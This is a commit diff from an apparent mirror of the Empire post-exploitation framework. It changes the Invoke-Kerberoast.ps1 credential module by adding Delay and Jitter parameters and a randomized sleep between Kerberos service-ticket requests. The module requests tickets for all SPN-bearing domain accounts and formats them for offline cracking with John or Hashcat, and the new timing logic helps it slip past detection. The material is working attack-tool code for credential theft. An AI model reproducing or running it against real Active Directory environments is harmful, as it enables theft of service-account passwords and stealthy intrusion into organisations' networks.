infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'dev' of https://github.com/EmpireProject/Empire into dev

3.0-Beta
xorrior 2018-03-14 14:06:00 -04:00
parent ea08326c72 69d6e27c85
commit 2e04538d7d
1 changed files with 34 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
data/module_source/credentials/Invoke-Kerberoast.ps1
View File

@ -487,6 +487,14 @@ Defaults to 'John'.
A [Management.Automation.PSCredential] object of alternate credentials A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote domain using Invoke-UserImpersonation. for connection to the remote domain using Invoke-UserImpersonation.
.PARAMETER Delay
Specifies the delay in seconds between ticket requests.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.EXAMPLE .EXAMPLE
Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
@ -543,6 +551,14 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
[String] [String]
$OutputFormat = 'John', $OutputFormat = 'John',
[ValidateRange(0,10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Management.Automation.PSCredential] [Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()] [Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty $Credential = [Management.Automation.PSCredential]::Empty
@ -563,8 +579,11 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
else { else {
$TargetObject = $SPN $TargetObject = $SPN
} }
$RandNo = New-Object System.Random
ForEach ($Object in $TargetObject) { ForEach ($Object in $TargetObject) {
if ($PSBoundParameters['User']) { if ($PSBoundParameters['User']) {
$UserSPN = $Object.ServicePrincipalName $UserSPN = $Object.ServicePrincipalName
$SamAccountName = $Object.SamAccountName $SamAccountName = $Object.SamAccountName
@ -641,6 +660,8 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
$Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
Write-Output $Out Write-Output $Out
} }
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
} }
} }
@ -1029,6 +1050,10 @@ Defaults to 'John'.
.PARAMETER Credential .PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain. for connection to the target domain.
.PARAMETER Delay
Specifies the delay in seconds between ticket requests.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.EXAMPLE .EXAMPLE
Invoke-Kerberoast | fl Invoke-Kerberoast | fl
Kerberoasts all found SPNs for the current domain. Kerberoasts all found SPNs for the current domain.
@ -1089,6 +1114,14 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
[Switch] [Switch]
$Tombstone, $Tombstone,
[ValidateRange(0,10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[ValidateSet('John', 'Hashcat')] [ValidateSet('John', 'Hashcat')]
[Alias('Format')] [Alias('Format')]
[String] [String]
@ -1121,7 +1154,7 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
PROCESS { PROCESS {
if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }
Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -Delay $Delay -OutputFormat $OutputFormat -Jitter $Jitter
} }
END { END {